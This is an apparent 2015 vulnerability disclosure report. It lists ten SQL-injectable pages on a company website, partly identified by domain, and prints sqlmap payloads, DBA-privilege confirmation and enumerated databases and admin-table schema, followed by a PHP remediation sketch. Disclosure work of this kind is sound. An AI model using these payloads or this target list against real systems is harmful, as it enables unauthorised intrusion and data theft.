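2015-11-02: Details reported to the vendor; awaiting vendor handling
2015-11-06: Vendor confirmed; details disclosed to the vendor only
2015-11-16: Details disclosed to core white hats and experts in related fields
2015-11-26: Details disclosed to regular white hats
2015-12-06: Details disclosed to trainee white hats
2015-12-21: Details disclosed to the public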
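...let's file this one as a major vendor.
Ten SQL injection points bundled together, DBA privileges, multiple databases involved.
First:
http://**.**.**.**/about.php?id=13
The id parameter is injectable.
Second:
http://**.**.**.**/caselist.php?id=55
The id parameter is injectable.
Third:
http://**.**.**.**/huodonglist.php?id=46
The id parameter is injectable.
Fourth:
http://**.**.**.**/news.php?id=16
The id parameter is injectable.
Fifth:
http://**.**.**.**/newsDetail.php?id=34&tid=13
Both the id and tid parameters are injectable.
Sixth:
http://**.**.**.**/product.php?id=1
The id parameter is injectable.
Seventh:
http://**.**.**.**/productDetail.php?id=48&pid=1&tid=1
The id, pid and tid parameters are all injectable.
Eighth:
http://**.**.**.**/shhzhx.php?id=5&pid=24
Both the id and pid parameters are injectable.
Ninth:
http://www.ubestchoice.co/shhzhxDetail.php?id=120&tid=2
The id and tid parameters are injectable.
Tenth:
http://www.ubestchoice.co/srshqDetail.php?id=53
The id parameter is injectable.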
web server operating system: Linux CentOS 6.5
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
current user: 'root@localhost'
current database: 'sq_boqiao1019'
current user is DBA: True
available databases [13]:
[*] bqmobile
[*] db_opencart
[*] extmail
[*] information_schema
[*] jifen_fangyuan
[*] mysql
[*] sq_boqiao1019
[*] test
[*] v9_phpcms
[*] we_ticket
[*] yudianapp
[*] zhuqing
[*] zyy

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=13 AND 9380=9380
    Vector: AND [INFERENCE]

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: id=13;(SELECT * FROM (SELECT(SLEEP(5)))kumB)#
    Vector: ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=13 AND (SELECT * FROM (SELECT(SLEEP(5)))renQ)
    Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: id=-4940 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767171,0x71566b41415776704867,0x71627a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
    Vector: UNION ALL SELECT NULL,NULL,[QUERY],NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---

Database: sq_boqiao1019
[29 tables]
+--------------------+
| ywy_aboutus        |
| ywy_aboutus_type   |
| ywy_admin          |
| ywy_growup         |
| ywy_growup_type    |
| ywy_joininfo       |
| ywy_lianjie        |
| ywy_link           |
| ywy_login_log      |
| ywy_mail           |
| ywy_menu           |
| ywy_news           |
| ywy_news_type      |
| ywy_partner        |
| ywy_partner_type   |
| ywy_photolink      |
| ywy_photolink_type |
| ywy_product        |
| ywy_product_type   |
| ywy_project        |
| ywy_project_type   |
| ywy_qqemail        |
| ywy_role           |
| ywy_role_menu      |
| ywy_sever          |
| ywy_sever_type     |
| ywy_state          |
| ywy_traning        |
| ywy_traning_type   |
+--------------------+

Database: sq_boqiao1019
Table: ywy_admin
[9 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| create_time | int(11)     |
| email       | varchar(50) |
| id          | int(11)     |
| last_time   | int(11)     |
| password    | varchar(32) |
| role_id     | int(11)     |
| state_id    | int(11)     |
| user_id     | varchar(20) |
| username    | varchar(20) |
+-------------+-------------+

Database: sq_boqiao1019
Table: ywy_admin
[4 entries]
+----------+----------------------------------+----------------------+
| username | password                         | email                |
+----------+----------------------------------+----------------------+
+----------+----------------------------------+----------------------+
Filter the parameters. I won't dig any further; please fix this as soon as possible.
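The fix requested above, sketched for the integer GET parameters (id, tid, pid) that the report lists. This is an added example, not code from the affected site or from the original report; the table, column, schema and account names are hypothetical, and it assumes the pages reach MySQL through PDO.

```php
<?php
// Added example; table, column, schema and account names are hypothetical.

// Accept only a plain decimal integer. Arrays and strings such as
// "13 AND 9380=9380", "-4940 UNION ..." or "13;(SELECT ...)" yield null.
function int_param(array $source, $name)
{
    if (!isset($source[$name]) || !is_string($source[$name])) {
        return null;
    }
    $value = $source[$name];
    if (!ctype_digit($value) || strlen($value) > 9) {
        return null; // empty, signed, non-numeric, or too long for a 32-bit int
    }
    return (int) $value;
}

function open_db()
{
    // Placeholder DSN and credentials: a dedicated account holding only
    // SELECT on the site's own schema (assumed), instead of root@localhost.
    $pdo = new PDO('mysql:host=localhost;dbname=site_db', 'web_ro', 'CHANGE_ME');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Server-side prepares: bound values travel separately from the SQL
    // text, and a multi-statement string is rejected at prepare time.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $pdo;
}

function fetch_news_detail(PDO $pdo, $id, $tid)
{
    $stmt = $pdo->prepare('SELECT title, body FROM news WHERE id = :id AND type_id = :tid');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':tid', $tid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

$id  = int_param($_GET, 'id');
$tid = int_param($_GET, 'tid');
if ($id === null || $tid === null) {
    header('HTTP/1.1 400 Bad Request');
    exit;
}
$row = fetch_news_detail(open_db(), $id, $tid);
if ($row === false) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
echo htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8');
```

Validation and binding close the injection itself; the restricted account limits what any remaining flaw can reach, which matters here because the report shows the application connecting as a DBA with 13 databases visible.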
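Severity: High
Vulnerability Rank: 10
Confirmed: 2015-11-06 16:15
CNVD confirmed and reproduced the issue as described, and has notified the site operator by email through its public contact channel; the operator is to provide a fix.
None yet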